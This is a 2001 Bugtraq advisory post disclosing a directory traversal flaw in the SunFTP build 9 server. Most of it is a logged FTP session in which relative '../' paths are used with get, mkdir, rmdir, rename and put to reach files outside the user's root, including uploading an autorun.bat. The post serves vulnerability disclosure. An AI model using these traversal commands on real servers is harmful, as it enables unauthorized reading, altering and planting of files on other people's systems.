Bugtraq mailing list archives
Sunftp build9(1) - ftp server Vulnerability
From: se00020 () LION CC
Date: Fri, 2 Mar 2001 12:14:23 -0000
It is possible to break out of the root directory by using relative paths e:\crap was used as homedir. of user test. #the get command# getting files from outside of the root dir. 220 chris FTP Server (SunFTP b9) ready on port 21... Benutzer (10.17.3.44:(none)): test 331 Password required for test. Kennwort: 230 User test logged in. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 . drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .. -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt 226 File sent ok FTP: 179 Bytes empfangen in 0,00Sekunden 179000,00KB/s ftp> cd .. 501 CWD failed. No permission ftp> get ../sunftptest.txt 200 Port command successful. 150 Opening data connection for ../sunftptest.txt. 226 File sent ok FTP: 1443 Bytes empfangen in 0,00Sekunden 1443000,00KB/s #the mkdir command# without priv. to create directories: ftp> mkdir test 550 '/test': can't create directory. ftp> mkdir ../test 257 '/../test': directory created. hell!it's getting worse... #the rmdir command# without any priv. to remove anything ftp> rmdir ../test 250 '/../test': directory removed. this only works with empty directories #the rename command# it is possible to rename files outside of the root directory without permissions.And it is also possible to move files with the rename command, when the filename is known. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 . drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .. -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test 226 File sent ok FTP: 240 Bytes empfangen in 0,00Sekunden 240000,00KB/s ftp> cd .. 501 CWD failed. No permission ftp> rename ../sunftptest.txt movedtohomedir.txt 350 File exists, ready for destination name. 250 File '/../sunftptest.txt' renamed to '/movedtohomedir.txt'. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 . drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .. -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt 226 File sent ok FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s #the put command# If you have permission to upload files, you can put these files outside of the homedir. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 . drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .. -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt 226 File sent ok FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s ftp> put Lokale Datei c:\test.txt Remotedatei test.txt 200 Port command successful. 150 Opening data connection for test.txt. 226 File received ok ftp> put Lokale Datei c:\test.txt Remotedatei ../autorun.bat 200 Port command successful. 150 Opening data connection for ../autorun.bat. 226 File received ok Solution no quick bugfix. Use with care I tried to contact the authors, but their webpage seems to be down. se00020 () lion cc or se00020 () fhs-hagenberg ac at
Current thread:
- Sunftp build9(1) - ftp server Vulnerability se00020 (Mar 02)